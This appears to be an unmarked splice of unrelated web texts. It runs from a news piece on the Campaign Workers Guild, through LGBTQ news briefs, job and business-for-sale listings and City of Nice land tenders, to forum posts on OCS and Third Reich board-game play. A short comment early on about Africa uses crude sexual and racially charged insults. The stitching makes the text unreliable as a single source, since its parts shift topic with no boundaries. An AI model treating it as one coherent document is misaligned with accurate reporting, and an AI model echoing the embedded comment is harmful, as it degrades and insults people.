Campaign Workers Unionize to Get Higher Pay, Severance and Even Warmer Offices

The midterm elections are a month away, which means the next few weeks are an incredibly demanding time for the people who work on campaigns. But there's been a growing movement over the past few months to protect field workers and canvassers from potentially exploitative workplace conditions. A new, independent union called the Campaign Workers Guild formed in February and has bargained contracts for 24 campaigns. It now represents over 500 members nationwide.

That's right. The organizers are getting organized.

In the past, campaign workers have unionized by joining existing unions for different kinds of workers. But in February of this year, a group of organizers decided there was a need for a separate and specific union for people who work on political campaigns.

Kim McMurray, a former organizer for Vermont Senator Bernie Sanders, was involved in the creation of the guild. She's now on the executive council. She says field organizers often work long, erratic hours and can find themselves suddenly out of a job when their candidate drops out or loses a race.

"The overarching message from leadership on campaigns is that you do this work because you love it. And that’s absolutely true," said McMurray. "That doesn’t mean we should be sacrificing our own well-being to do it."

The union has several top priorities when they come to the bargaining table with a candidate: fair pay, fair scheduling, safe and secure housing, health-care stipends and contract language about sexual harassment and discrimination. But ultimately it's up to the workers to decide what to bargain for.

"We've had people ask for making sure the temperature in their office is a normal amount, to severance at the end of a campaign, to a wide range of things in the middle," said McMurray. "We made it pretty typical that you'll get paid for at least two weeks after the campaign, which was really not something that's been standard before."

McMurray says the Campaign Workers Guild is open to representing Democratic and Republican campaign workers, though so far all of their members work for Democratic candidates.

"For decades, the majority of workers on campaigns, especially Democratic ones, have been denied the very same protections that their candidates publicly champion," said McMurray. "There became a real disconnect." 

All this means, between severance packages, higher hourly wages, and healthcare stipends, candidates who agree to the demands of their unionized staff end up spending more to run their campaigns. Julia Salazar, a Democratic candidate for New York State Senate, is one of two active candidates in New York whose workers have unionized under the Campaign Workers Guild. She says severance packages and higher hourly wages were the biggest points of negotiation.

"That was probably the most important thing and that also naturally took more out of our budget," Salazar told WNYC. "Our negotiations were brief. I really wanted to provide the strongest contract and the most generous contract that I was able to."

Salazar, herself a member of the National Writers Union, says agreeing to better working conditions is part of "walking the walk" as a progressive candidate.

Campaign workers for Max Rose, a Democrat running for New York's 11th congressional district, have also unionized under the Campaign Workers Guild. New York campaigns that are no longer active but whose workers unionized through CWG include Cynthia Nixon for governor, Ross Barkan for state senate and Brian Flynn for congress.


'CA Republican steals transgender veteran's photo for ugly attack ad' & other Tue midday news briefs
Nasty and disrespectful way to treat those who fight for our freedoms.

California Republican steals transgender veteran’s photo for campaign attack - First folks on the opposite side of our equality want to take our tax dollars while discriminating against us. Now they want to exploit our faces and images. Tacky as hell.  

Gay Comedian Sampson McCormick Will Make History on Coming Out Day - Sampson is a wonderful comedian and definitely deserves this honor. McCormick will headline a Coming Out Day event at the National Museum of African-American History in Washington D.C., on Thursday, October 11. The event will celebrate the contributions of black queer art of the Harlem Renaissance; McCormick will be the first LGBTQ comic to ever perform at a Smithsonian museum.  

Black History Month: 5 black LGBT heroes who fought for equal rights - Goes without saying. A few of these folks even I wasn't aware of. 

Victory! Hawai`i Supreme Court Upholds Parenting Rights and Responsibilities of Married Same-Sex Couples - Good news! Under the radar but still good news. 

GLAAD is accepting nominations for its 30th annual GLAAD Media Awards - calling ALL LGBTQ blogs! You can nominate yourself and GLAAD is waiving the admission fee for LGBTQ blogs. As a past recipient of a GLAAD Media Award (that just brought a delightful chill down my spine), I can tell you that even being nominated is a huge honor. And winning is like  . . .  wheeeew!!! It's been over a year and there is a part of me which still isn't down from the high.

Africa where nature has remained unchanged for your sake.........with over 100,000 elephants..... how naturally remained is that what you offer in african terms....? its called prostitution and/or exploitation sucking white dicks for money I call that post-post-colonialism. sorry for being rude, but i think it stinks what u do. jay-b
Seasonal Operations - Sephora - Saint-Bruno-de-Montarville, QC
QC-St Bruno (0520). Workplace name: QC-St Bruno (0520). Requisition ID:....
From Sephora - Wed, 05 Sep 2018 20:28:54 GMT - View all Saint-Bruno-de-Montarville, QC jobs
FAST FOOD
DIAGNOSTIC COMPLETED - Fast-food outlet located in Toulouse in a business and retail park. Varied menu: sandwiches, salads, burgers and a daily special. Open at lunchtime, Monday to Friday. 20 m² premises fitted with all the equipment needed to store, prepare and cook the products. Outdoor terrace seating up to 20. Run by the owner with one employee for lunchtime service. Turnover: €54,512. Rent: €250/month. Business price: €30,000. CONTACT: Chambre de métiers et de l'artisanat de la Haute-Garonne - Mme GRANIER
BED AND BREAKFAST AND HOLIDAY COTTAGE
For sale, 17th-century house, 13 rooms/650 m² on 5,500 m² of land, south of the Luberon. In a rural setting, away from the noise of the town, this property offers an unobstructed view over the Durance valley and the Pénitents des Mées. In operation: 5 guest rooms, 1 dormitory sleeping 10, 1 cottage for 2 in a former dovecote, 5 shower rooms and 2 bathrooms + 8 WCs. A 120 m² private area (with 2 bedrooms). A 110 m² dining room, a 60 m² kitchen, a laundry and a bicycle storage area. The grounds are landscaped and include a relaxation area with jacuzzi. Ideal for hosting events such as weddings, christenings and corporate seminars, but also for welcoming visitors to the valley, hikers and mountain bikers, since the property lies within a mountain-bike park. All done with great charm while preserving the character of the old building (fine original stone staircase, large vaulted hall...). Ideal for a couple. A personal capital contribution is essential. Price for the whole: €900,000. Handover support from the seller possible.
3-STAR HOTEL RESTAURANT
3-star Logis de France hotel restaurant, located on one of the finest stages of the Way of St James to Santiago de Compostela (20,000 walkers a year), between Le Puy and Conques on the Aubrac plateau. The business has been run since 2009 by a couple of true professionals who have invested regularly and worked on quality and service to build a sustainable activity; thanks to its specific characteristics, it presents a rare opportunity: - 800 m² of built floor area with 17 tastefully and carefully decorated rooms - indoor restaurant capacity of 70 covers - a very strong reputation and online visibility: 89% satisfaction rate across 1,107 reviews on 12 portals - turnover of €656,000 and growing, with EBITDA of €132,000 (operator's remuneration included). In addition, its location in a rural revitalisation zone (ZRR) gives access to several specific schemes (tax exemption for 5 years, then 3 years on a decreasing scale) and an investment subsidy on purchase from the community of communes. Price of the premises: €440,000; price of the business: €400,000.
HAIR SALON
Nevers Grand Mouesse. For health reasons, selling a unisex hair salon operated for 12 years, located in a busy area with free parking and next to local shops. Fully renovated salon with 4 styling stations, 2 backwash basins, 1 Climazon and reversible air conditioning. Complete equipment in very good condition. One operator. Latest turnover excluding tax of €45,297, EBITDA: 30%. Selling business + premises (42 m² of working space on the ground floor, 20 m² office/storage on the first floor and an outdoor courtyard with scope for development). Price of the business alone: €24,000. Business + premises: €61,000.
FLORIST ...
SALE OF FLOWERS, PLANTS, GIFTS, ARRANGEMENTS FOR FUNERALS AND WEDDINGS. Owner retiring; selling the business, turnover €170,000. At the entrance to the town of Douai. Fine, well-known business operated for 35 years in floristry and gifts. Lease exclusive to florist use. 99 m² corner shop. Frontage with 2 x 4 m of shop window. 94 m² workshop/stockroom with garage door. Cold room approx. 20 m². Cellar. Rent €808/month. Price of the business: €120,000.
ITALIAN FAST FOOD
Italian fast food, takeaway-oriented, located in a shopping centre in Rouen. Only one year of trading. New equipment, interior by an interior designer. Dining room + outdoor terrace. Team of 4 employees + 1 unpaid manager. Open 11:30 to 22:00, 7 days a week. Website. Sale of the company's shares, including the first financial year's liabilities (approx. €75K) and the long-term financial commitments linked to the start-up (€120K). Possibility of opening in the morning. Operating break-even expected in June 2019 (Armada Rouen). Sale price: €60K.
CAFÉ BRASSERIE HOTEL
Café brasserie hotel, located in a major town in Vaucluse, in a good spot. Dining room of 60 covers, terrace of 30 covers. 11 rooms, 10 of which have a toilet and shower room. Unclassified. Large kitchen. Building of ground floor + 3 storeys, about 350 m². Operated as a sole proprietorship with no employees. Commercial lease transferred on sale, with annual rent of €18,000 excluding tax and the option to buy the premises. Price of the business: €140,000 - premises and business: €450,000. Sale due to retirement.
AAPC CAROUSEL PLACE ARMÉE DU RHIN
LOCAL AUTHORITY OFFERS - The City of Nice is launching a competitive procedure to authorise occupation of public land for the operation of a carousel on Place Armée du Rhin, Nice. The carousel's diameter will be at least 7 metres. At the end of the procedure, a municipal public-land occupation agreement will be concluded. 1) Key terms of the agreement: annual public-land occupation fee, made up of a fixed annual part (floor set at €3,000) and a variable part equal to 0.5% of the operation's annual turnover excluding tax (minimum collectable amount €500). Term: the agreement takes effect on its date of notification, subject to fulfilment of the conditions precedent. It is concluded for 3 years from the first day of operation of the carousel, renewable three times for one year each time by tacit renewal (maximum term: 6 years). 2) Award criteria - Annual fee proposed by the candidate, starting from the €3,000 floor (weight in the evaluation of bids: 50%) - Appearance of the carousel and integration into the site (weight: 35%) - Sustainable development (weight: 15%). 3) Procedure: the rules for preparing and submitting applications are set out in Article 7 of the consultation rules. The full consultation file can be obtained from: DIRCEP Service ODP concurrentielles, 37 avenue Maréchal Foch, 3rd floor, or at https://webodp.nicecotedazur.org/WebODP/AppelConcurrence.aspx - Deadline for receipt of applications: 5 November 2018 at 16:00. For information: 04.97.13.27.49 or 04.97.13.23.89.
AAPC CAROUSEL PARC CASTEL DEUX ROIS
LOCAL AUTHORITY OFFERS - The City of Nice is launching a competitive procedure to authorise occupation of public land for the operation of a carousel at Parc du Castel des Deux Rois, Nice. The carousel's diameter will be 7 metres. At the end of the procedure, a municipal public-land occupation agreement will be concluded. 1) Key terms of the agreement: annual public-land occupation fee, made up of a fixed annual part (floor set at €12,000) and a variable part equal to 0.5% of the operation's annual turnover excluding tax (minimum collectable amount €500). Term: the agreement takes effect on 29 March 2019. It is concluded for 3 years, renewable three times for one year each time by tacit renewal (maximum term: 6 years). 2) Award criteria - Annual fee proposed by the candidate, starting from the €12,000 floor (weight in the evaluation of bids: 70%) - Appearance and sustainable development (weight: 30%) 3) Procedure: the rules for preparing and submitting applications are set out in Article 7 of the consultation rules. The full consultation file can be obtained from: DIRCEP Service ODP concurrentielles, 37 avenue Maréchal Foch, 3rd floor, or at https://webodp.nicecotedazur.org/WebODP/AppelConcurrence.aspx. Deadline for receipt of applications: 5 November 2018 at 16:00. For information: 04.97.13.27.49 or 04.97.13.23.89.
AAPC SNACK BAR PARC CAROL DE ROUMANIE
LOCAL AUTHORITY OFFERS - The City of Nice is launching a competitive procedure to authorise occupation of public land for the operation of a snack bar with terrace at Parc Carol de Roumanie, 23 avenue de Fabron, Nice. At the end of the procedure, a municipal public-land occupation agreement will be concluded. 1) Key terms of the agreement: annual public-land occupation fee, made up of a fixed annual part (floor set at €5,500) and a variable part equal to 1% of the operation's annual turnover excluding tax (minimum collectable amount €500). Term: the agreement takes effect no earlier than 28 December 2018. It is concluded for one year, renewable twice for one year each time by tacit renewal (maximum term: 3 years). 2) Award criteria: - Annual fee proposed by the candidate, starting from the €5,500 floor (weight in the evaluation of bids: 70%) - Variety and sustainable development (weight: 30%): o variety of the products offered o promotion of organic products o use of eco-labelled products for cleaning the premises - 3) Procedure: the rules for preparing and submitting applications are set out in Article 7 of the consultation rules. The full consultation file can be obtained from: DIRCEP - Service ODP concurrentielles - 37 avenue Maréchal Foch, 3rd floor - or at http://usagers.ville-nice.fr/WebODP/AppelConcurrence.aspx - Deadline for receipt of applications: 5 November 2018 at 16:00. For information: 04.97.13.27.49 or 04.97.13.23.89.
AAPC PLANTS AND FLOWERS SHOP
LOCAL AUTHORITY OFFERS - The City of Nice is launching a competitive procedure to authorise occupation of public land for the operation of a plants and flowers shop with adjoining display stall at 5 place Caucade, Nice. At the end of the procedure, a municipal public-land occupation agreement will be concluded. 1) Key terms of the agreement: annual public-land occupation fee, made up of a fixed annual part (floor set at €11,500) and a variable part equal to 1% of the operation's annual turnover excluding tax (minimum collectable amount €1,000). Term: the agreement takes effect on 13 April 2019. It is concluded for one year, renewable three times for one year each time by tacit renewal (maximum term: 4 years). 2) Award criteria - Annual fee proposed by the candidate, starting from the €11,500 floor (weight in the evaluation of bids: 70%) - Sustainable development (weight: 30%) 3) Procedure: the rules for preparing and submitting applications are set out in Article 7 of the consultation rules. The full consultation file can be obtained from: DIRCEP Service ODP concurrentielles, 37 avenue Maréchal Foch, 3rd floor, or at http://usagers.ville-nice.fr/WebODP/AppelConcurrence.aspx - Deadline for receipt of applications: 5 November 2018 at 16:00. For information: 04.97.13.27.49 or 04.97.13.23.89.
Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says - NPR

NPR


"At its peak, Apple was seeing 60% of warranty repairs in China and Hong Kong as being fraudulent, literally costing Apple billions of dollars per year"
9to5:
Initially, Apple stopped allowing walk-in repairs and required reservation systems that supposedly ensured proof of ownership was provided. The system was beaten by hackers who exploited vulnerabilities in the web system to snipe all the time slots.

Apple then required candidate iPhone devices to run software diagnostics which would identify any fake parts inside, without requiring store staff to disassemble components and perform inspections. The thieves circumvented this by simply making the iPhones not turn on.

Some criminals were even more sophisticated.

Butchery Manager M/F
As Butchery Manager, your duties are: Marketing your products through original displays in line with the Director's expectations:
* You develop and implement regular, hard-hitting promotions.
Managing economic ratios:
* You manage your operating account and your performance indicators and put in place the actions needed to reach the targets set. Your results focus and rigour enable you to meet your objectives,
* You master preservation techniques,
* You ensure the upkeep of equipment and premises,
* You master use-by dates (DLC),
* You ensure hygiene, traceability, safety and environmental compliance,
* You supervise and support your team so that it maximises customer satisfaction and makes your department attractive,
* A true retailer, you put customer satisfaction at the heart of your job; your thorough product knowledge and sound advice are recognised by your customers.
Masonry Project Manager M/F
Reporting directly to the Operations Manager, you handle the full delivery of projects in your field: repair of civil engineering structures, repair of deteriorated concrete, strengthening of reinforced-concrete structures, cleaning, façade renovation... Your duties include:
* Securing the company's client portfolio commercially by managing projects in your field end to end, from design through to producing quotes,
* Carrying out and steering the technical, financial and budgetary studies for project files, both at tender stage and during execution,
* Responding to tender files,
* Monitoring site work through to handover.
You are in constant contact with project owners and project managers and organise the handover of files to the works teams; you plan your work independently in liaison with the company's various stakeholders (senior management, supervisory staff, site staff, clients and suppliers).
Low-Voltage Systems Technician M/F
Reporting to the Company Director and to the Operations Manager, as Low-Voltage Systems Technician you are responsible for:
* Completing site work and after-sales service jobs, both administratively and technically,
* Preparing and administering site work with the Operations Manager (procurement, gathering technical documents, quotes, invoicing...),
* Coordinating your work with the other trades and attending site meetings,
* Mastering installation techniques (locksmithing, safes, alarms, video...) in order to diagnose faults and intervene,
* Being the main point of contact for your clients in order to deliver a suitable solution,
* Closing out site work and call-outs (with a view to issuing a quote or rescheduling an intervention),
* Completing ABSAD technical sheets (video, alarm).
Commercial Lease Property Manager (M/F)
As Commercial Lease Property Manager, your main duties are:
* Processing incoming emails and letters,
* Lease renewals,
* Handling notices to quit,
* Following up on insurance claims,
* Ensuring the lease clauses are applied,
* Assisting with the handling of disputes,
* Liaising with internal departments (Legal, Technical, Operations),
* Liaising with tenants, landlords and various external parties. This list is not exhaustive.
Maintenance Manager (M/F)
You are responsible for leading the entire Maintenance Department (preventive, corrective, predictive and continuous improvement) and for setting short-term objectives (reliability, costs, training) and long-term objectives (investments, maintenance budgets...). In this capacity, your duties are as follows:
* You coordinate all maintenance actions on the operating facilities in collaboration with your teams,
* You define and steer the maintenance budgets in collaboration with Site Management and Industrial Management,
* You roll out the budgets by area and support the members of your team in implementing them,
* You maintain the nominal performance of the facilities within cost constraints and optimise their availability,
* You ensure, as do the Production Managers, that the protective devices for people and machines are maintained and that safety and environmental matters are actively driven within your area,
* You work to improve safety and working conditions on new facilities and roll out the necessary training plans.
Major Works Project Manager (M/F)
In your role as Major Works Project Manager, you work under the direction of the Operations Director. Your main duties are:
* You are the guarantor of a well-run client relationship,
* You work to turn the programme into a project,
* You plan the project to ensure delivery within the allotted deadlines,
* You coordinate all technical studies, internal and external,
* You lead the preparation of the administrative authorisation files required for the sites,
* You collaborate with the Works Departments through to delivery. This list is indicative, to let you picture the main aspects of the position. It is not exhaustive.
Maintenance Manager (M/F)
You are responsible for leading the entire Maintenance Department (preventive, corrective, predictive and continuous improvement) and for setting short-term objectives (reliability, costs, training) and long-term objectives (investments, maintenance budgets...). In this capacity, your duties are as follows:
* You coordinate all maintenance actions on the operating facilities in collaboration with your teams,
* You roll out the budgets by area and support the members of your team in implementing them,
* You maintain the nominal performance of the facilities within cost constraints and optimise their availability,
* You ensure, as do the Production Managers, that the protective devices for people and machines are maintained and that safety and environmental matters are actively driven within your area,
* You work to improve safety and working conditions on new facilities and roll out the necessary training plans,
* You manage your teams (organising activity, individual reviews, workplace climate, training, etc.) and support the development of their skills.
Medical Equipment Account Manager (F/M)
Our client is a leading company in the distribution of veterinary medicines, pet food, equipment and services to veterinarians, present in France and Europe. To fill a vacancy, we are looking for a: Medical Equipment Account Manager (F/M) (Sector **********). Reporting to the Regional Sales Manager, you grow the revenue of your territory by providing technical promotion and sales of a catalogue of high-quality equipment, build loyalty among an existing client base of veterinary clinics and practices, and prospect for new clients. Your main duties are:
- client targeting and building action and visit plans,
- qualifying client needs,
- implementing the commercial offer, presenting the product ranges, conducting negotiations and closing sales,
- taking part in equipment installation, applying your expertise in supporting the client and handling first-level maintenance where necessary,
- more broadly, promoting and selling all of the company's products and services,
- collaborating with the Account Managers in your territory to capture every opportunity relating to the distribution of medicines and pet food or the sale of services,
- active competitive intelligence.
Key Account Manager (F/M)
Our client is today the world leader in relationship marketing based on consumers' actual purchasing behaviour. By exploiting behavioural databases (notably via loyalty cards), this Group sets up targeted promotional offers with a Digital CRM approach that is highly successful in its market. We are looking for a: KEY ACCOUNT MANAGER (F/M), position based in Paris. Reporting to the Sales Director for Consumer Goods France, you will be in charge of a portfolio of existing clients and prospects. Main duties:
- Diagnose and draw up a commercial action plan across your whole portfolio in order to grow the business sustainably.
- Implement the strategy: prospecting, drawing up marketing action plans, identifying and securing meetings with all key contacts.
- Benchmark the market, maintain competitive intelligence and look for growth drivers,
- Coordinate the work of the consultants on the portfolio and projects, and guarantee the quality of service delivered.
- Add value in the context of selling a high-end marketing service.
- Manage and develop the client relationship.
MOEX Business Manager (M/F)
In your role as MOEX Business Manager, you work under the direction of the Operations Director. Your main duties are:
* You supervise experienced Project Managers,
* You are the guarantor of a well-run client relationship on the most technical sites,
* You work to turn the programme into a project,
* You monitor the project to ensure delivery within the allotted deadlines,
* You centralise all technical studies, internal and external,
* You delegate the preparation of the administrative authorisation files required for the sites,
* You collaborate with the Works Departments through to delivery. This list is indicative, to let you picture the main aspects of the position. It is not exhaustive.
Product Development Engineer (M/F)
As Product Development Engineer, within the Engineering Department and under the responsibility of the Systems Engineering Manager, you take technical responsibility for the development and series life of air-conditioning equipment on the projects entrusted to you:
* Preparing technical bids during tender phases in liaison with the company's Technical Departments,
* During the development phase, guaranteeing the technical performance of your equipment and managing the design in compliance with the projects' quality criteria,
* Following the company's development process,
* Producing and/or supervising technical deliverables (calculation notes, technical documentation, drawings),
* Preparing and monitoring validation plans on prototypes,
* Monitoring customer type tests,
* Monitoring products in the operational phase at our customers' sites. To carry out these duties, beyond your own technical speciality, you rely on the experts and specialists of the Engineering Department.
Centre Manager (M/F)
As Manager of a competence centre, you play a key role in the development of our subsidiary Canon France Business Services; your main mission will be to ensure the operational management of the centre while growing the margin on the client accounts for which you are responsible. What we offer: At Canon, you will never be alone. Surrounded by colleagues as ambitious as you, you will have the support and guidance you need. We will play a part in your professional development by guiding you in the accomplishment of your duties. You will meet managers who give you the freedom to explore new possibilities within a team where knowledge and expertise are shared. Main activities:
- Organise, lead and coordinate a shared production centre
- Supervise, organise, plan and optimise the work of the production and supervisory teams (100 employees) in order to deliver production that meets requirements in terms of deadlines, quality and processing priority,
- Steer the centre's client relationships and guarantee client satisfaction
- Develop additional services for our clients
- Ensure the constant improvement and industrialisation of production techniques, the reduction of production costs and the increase in productivity
- Negotiate, set up and manage all subcontractors, suppliers and partners.
- Manage the centre's operating account in line with the company's commercial policy and guarantee compliance with the P&L in terms of Revenue and Margin.
- Guarantee the implementation of the centre's quality management system
Tenant-Manager YVES ROCHER (M/F)
Keen to go into business and put the skills acquired over your working life to use, with little investment? We have a tailor-made solution: the Yves Rocher tenant-management scheme! As a true business owner, your role is to:
- Listen to, advise and satisfy customers as well as possible through a professional and appropriate approach.
- Offer genuine quality of service in a pleasant and welcoming setting.
- Promote the values and strengths of the Brand.
- Recruit, train, lead and support your team.
- Maintain a healthy working atmosphere.
- Set the commercial objectives for your store.
- Ensure the long-term viability of your business through sound, controlled management, and take on and determine the associated costs (payroll, overheads, suppliers, royalties, etc.).
- Manage and control your stock according to commercial activity.
SALES & MAINTENANCE PARTNERSHIPS ENGINEER
Duties: Reporting to the Group Maintenance Manager, and in close collaboration with the sales department of the testing business and the Group's projects unit, your main duties will be as follows:
Strategy & Markets:
- Define a commercial strategy and implement a prospecting plan targeting new markets,
- Define and develop an action plan to manage and grow strategic partnerships with the world's best manufacturers of test equipment.
- Take part in defining the new services to be offered to the Group's clients,
- Set up and develop the business of buying/selling test equipment,
- Strengthen the sales of spare/replacement parts.
- Negotiate and implement annual maintenance contracts with clients,
Duties & Objectives:
- Actively prospect in the field, using the means made available (prospect files / Group clients, CRM, business clubs, trade shows, running targeted communication campaigns...),
- Analyse, model and understand the needs and expectations of prospects as well as their decision chain,
- Grow the Group's Maintenance and Support revenue on the French and European markets
- Identify commercial targets through direct contacts and with the help of prospecting tools, as well as opportunities to take back/buy back test machines from your clients
- Capitalise on and respond to commercial opportunities and/or requests arising from Group synergies, in liaison with the cross-functional sales departments,
- Write and cost commercial and technical proposals with a differentiating approach, in collaboration with the technical experts of the maintenance department and with the Group's various support departments,
- Sign up and retain your Clients over the long term,
Cross-functional duties:
- Carry out competitive and strategic intelligence on your area
- Define and monitor, with the Group Maintenance Manager, the performance indicators for your actions,
- Be the Client interface with the Maintenance and Support department, handling presentations and the smooth handover of contracts to the various operational contacts.
- Guarantee the profitability of costings in line with management and the ratios defined upstream,
Store Director - Bayonne (M/F)
If you recognise yourself in this portrait... Are you ready to take charge of our Bayonne store? You lead your management team, made up of department heads, and coach them with ambition, recognition and high standards. Passionate about the world of the home (whether you are a fine gourmet or simply love food, creative or resourceful, anything is possible...), you define and implement your commercial strategy and contribute to the evolution of our product strategy (you are ready to take risks and are not afraid of failure!). You instil a strong results culture and steer your operating account in close collaboration with your management committee (meaning and teaching are your watchwords!). A retailer at heart, you embody listening to the customer and know how to involve your team to give this its full meaning in store. Bold, you actively contribute to innovation in creative home retail in a "just like home" spirit and rally your team around this company project.
FMOS-FAPH/USTTB: Ginna Dogon honours the memory of Prof. Ogobara Doumbo
On the morning of Friday 28 September 2018, a moving tribute was paid to the late Professor Ogobara Doumbo for his many achievements on behalf of Mali, Africa and the whole world. It was at the initiative of the Ginna Dogon association in partnership with the Faculty of Medicine and Odontostomatology (FMOS) and the Faculty of Pharmacy …
"The Aquarius in Switzerland? The costs would be too high"
The German owner of the humanitarian ship operated by SOS Méditerranée has little hope of seeing the vessel one day fly the Swiss flag. According to him, the financial and administrative burdens imposed by Swiss law are too heavy.
Affirmative Action as Counterweight to Privilege and Elitism

Betty Hung: As an Asian American woman, I refuse to be used by conservatives who are trying to exploit Asian Americans as a wedge in their efforts to abolish affirmative action in university admissions.

The post Affirmative Action as Counterweight to Privilege and Elitism appeared first on LA Progressive.


Thread: Smolensk: Barbarossa Derailed:: General:: Any tips for an OCS noob playing solo?

by tdbrad7

I've played the half turn introductory scenario, and feel like I got to grips with the general flow of conducting an assault (hip shoot, overrun(s), barrage, attack, then repeat with reserves and units that gained exploitation mode), as well as how to use combat supply, but it didn't feel like it taught me much in terms of how to account for the possible actions of an enemy, nor how to plan for future turns.

I'm now setting up scenario 2 and am feeling quite overwhelmed. I hadn't quite anticipated just how huge this game would feel, despite only being one map, and while I had read up on the rules in advance, and felt like I'd understood them, now that the game is in front of me, I feel like the intricacies of how the different subsystems interact are much more complex than I had previously thought.

I've read the player notes for this game, as well as general tips for playing OCS games, but they don't really seem to be aimed at complete beginners, and focus more on what you're trying to achieve, rather than how the game rules can be used to help you achieve it. I'm aware that what I'm probably looking for is the detailed walkthrough that comes with Reluctant Enemies (which I have looked at online briefly, but would mean much more if I could have the game set up in front of me), but I'm not really in a position to buy another game when I've barely touched this one.
Session: Rise and Decline of the Third Reich:: A legendary 3R game - Part 16: Summer 1940 Allied Turn (Full Turn)

by kostaskav

The allied gamble to finish off Germany:
The allied Anglo-French headquarters have now decided that the time has come to finish Germany off and all but end this game: There is clearly an opening: Even without air superiority, a 2-1 in Brussels is all but a guaranteed success, as the allies can sea transport units next to Brussels and can always guarantee enough air support to DAS intercept the maximum 9AF that Germany can commit. The big question is how to take this a step further. The key to the big victory is the survival of the surrounded French armor corps at N27. If it survives, the bulk of German forces in Belgium will be unsupplied and unable to threaten France next turn. There are even more grandiose plans drafted for a southern “pincer” that will result in a complete defeat of the Wehrmacht. Of course all these are theoretical as the Germans have 20AF vs 18AF for the allies. In this situation the rule of thumb is that you don’t declare an offensive without air superiority. However the allies hope to deceive the Germans and force them to overcommit their DAS in one part of the front, thus leaving openings in different parts of the front in order for the offensive to bear fruit. For example, if 9AF of DAS are committed to Brussels and the allies choose not to fully DAS intercept, they may have enough forces available to DAS intercept elsewhere…The allies can always manage a 1-1 with a close to 50% chance of success in resupplying the isolated French armor even without ground support. The joint Anglo-French conference opts to shed 60BRP for a joint Western offensive that also has the advantage of finishing off Norway and getting this hassle out of the way…The drawback is that builds have to be kept to a minimum to prevent the threat of an Axis double turn that will mean the Fall of France or even worse…

Here is the situation in the West just before the allied offensive begins: Please note that there are 13FF in Bremen and 1FF in Kiel. This has corrected a “carryover error” from part 14. (See prior commentary)



What about the Soviets? Obviously they want to get rid of the Greek thorn in their side as soon as possible in order to concentrate on a potential German threat. They will opt for an offensive option.

Option Selections:

UK and France will take two offensive options in the West, while taking a joint attrition in the Med. USSR will declare an offensive in the Med and pass on all other fronts
New BRP levels are UK: 90(58), France: 65(32), USSR 108(47)
No voluntary destruction of units.

Movement of fleets:

Russians will not move any fleets. The UK and France announce the following fleet movements:

1) 18FF from Gibraltar to Plymouth (path as far from German interception as possible). UK will rearrange the counters from 9-8-2 to 9-9-1 (always allowed to do rearrangements to generate more 9FF counters)
2) 9FF from Brest to Calais

The Germans choose to intercept with 13FF from Bremen at Plymouth hex (11-20 range success with 1-4) and roll a 1 (successful).
The remaining French Atlantic fleet at Lorient chooses to intercept at L23 (1-10 range) and are also successful rolling a 3.
The situation just before resolution of naval battles is shown below:



The Franco-German naval battle at L23 rolls a 5-3. There is an overall +3DRM for Germans (+2 for Nationality, +1 for size). This means that the French go to -1 overall, losing 1NF, while the Germans continue without a scratch towards intercepting the Royal Navy at Plymouth.
The German-British naval battle at Plymouth rolls 2-6. The overall DRM is 0, as UK has +1 for Size and Germany +1 on Nationality DRM difference. Germans will lose 4FF and UK will lose 2FF, but the fleet movement will be successfully completed.
Here is the situation just after completion of the fleet movement:



Now, you may wonder why the allies chose to move their fleets. Gibraltar fleets can do Sea Transport missions, as well as Plymouth fleets! There were two reasons: Having more UK fleets at home also allows SR to France, and Gibraltar is essentially free of Seaborne invasion threats considering how decimated the German fleets are and with no Italy in the game. But, more importantly, the allied fleet movement aimed to lure the Germans into a naval battle so that the German fleets are unusable during the Axis turn and also for the remainder of the allied turn: There will be no more threat through the “capture an airport by an airdrop and SR a unit into Britain” trick, so barely any need for home defenses. Furthermore the naval battle gave more fragments that are useful as supply fleets. And there will be no interception of the massive allied Sea Transport Mission. The British Admiralty is high-fiving...
6FF will be designated as supply fleets from Scapa Flow to Bergen and Antwerp

Air and ground movements:

The Russians will move their eastern defenses closer to the front, worrying about some German surprise attack…
They will also move into Greek territory, occupying one Albanian hex and preparing to assault the Greek unit at CC27 with a likely exploitation to the DD27 hex next to Athens. They don’t try to commit more AF than the necessary 5 AF from Izmir, apparently intending to preserve their airbase counters for future use.
Here is the situation post movement in the Greek front:


The French move shows the Allied grand plans unfolding. Note the strategic position of the French armor at Metz! It is adjacent to both infantry stacks at P25 and Luxembourg. The isolated French armor at N27 can open the breakthrough by attacking either the Frankfurt 4-6 panzer corps or alternatively the Bonn infantry unit, thus forcing the Germans to split their DAS on two hexes. If the Germans fail to notice the danger the French armor at Metz can exploit deeply into the German rear essentially handing Hitler a humiliating defeat by the French in conjunction with some British progress in Belgium! This would be essentially a "game-over" situation for the beleaguered Germans…
The British do some inconsequential movements in Egypt, prepare to assault Oslo with 2X3-4 and 2AF from Bergen, and are also positioned to take Brussels. They will also displace the 2NF from Venice to Tobruk. Their attempt to intercept this Italian movement from Venice to Tobruk with 1NF from Gibraltar fails.
Here is the situation post-movement in the West:



It seems that the allies have “choked” at the most critical stage of this game committing some unimaginable blunders!
The positioning of the RAF trying to secure Brussels (or preserving the RAF for the Axis turn) rather than supporting the French offensive is hard to explain. The 2AF need NOT have been diverted to Norway, as a sea transported unit could do the job. Instead 15 AF of RAF should have been used to counterair the 15AF German superstack at Cologne/Essen so that it is not available during the German turn. The remaining 1AF should have been used on N26 to make the possible 1-1 attack there an 8 vs 6, while the 3 French AF should have been saved for possible DAS interception on Frankfurt or for defense purposes next turn. Now the Germans have only 5 AF left for DAS. If they wanted to secure Frankfurt they could still allocate 4AF on Frankfurt and 1AF on Bonn, but still the French have a chance to win the dogfight…
More importantly the Germans would have no AF left for their turn, and Anglo-French cooperation rules favor joint attacking, while joint defending is much less effective.
Instead the allies try a deception tactic hoping the Germans will not allocate much DAS and then surprise them with ground attacks. For example if the Frankfurt or Bonn attacks 1-1 succeeded with AAC (Advance after combat) and either the French armor survived, or another one exploited from Metz, another 1-1 on Q26 could encircle more armors….

Overall map after movement:


Missions:


Russians:
1) 1AF (Izmir) CA 1AF on Athens. Greek AF is eliminated. Russian AF survives and returns to Izmir
2) 2AF (Izmir) of GS on CC27
3) 9FF Seaborne Invasion on CC26 from Istanbul carrying 1X3-5
4) 9FF Seaborne Invasion on CC26 from Izmir carrying 1X3-3

French:
1) 4FF ST 1 x 2-3 to Marseilles and No air missions
UK:
1) 2AF GS on Oslo
2) 6FF from Plymouth carrying a 1-3 ST on Antwerp.
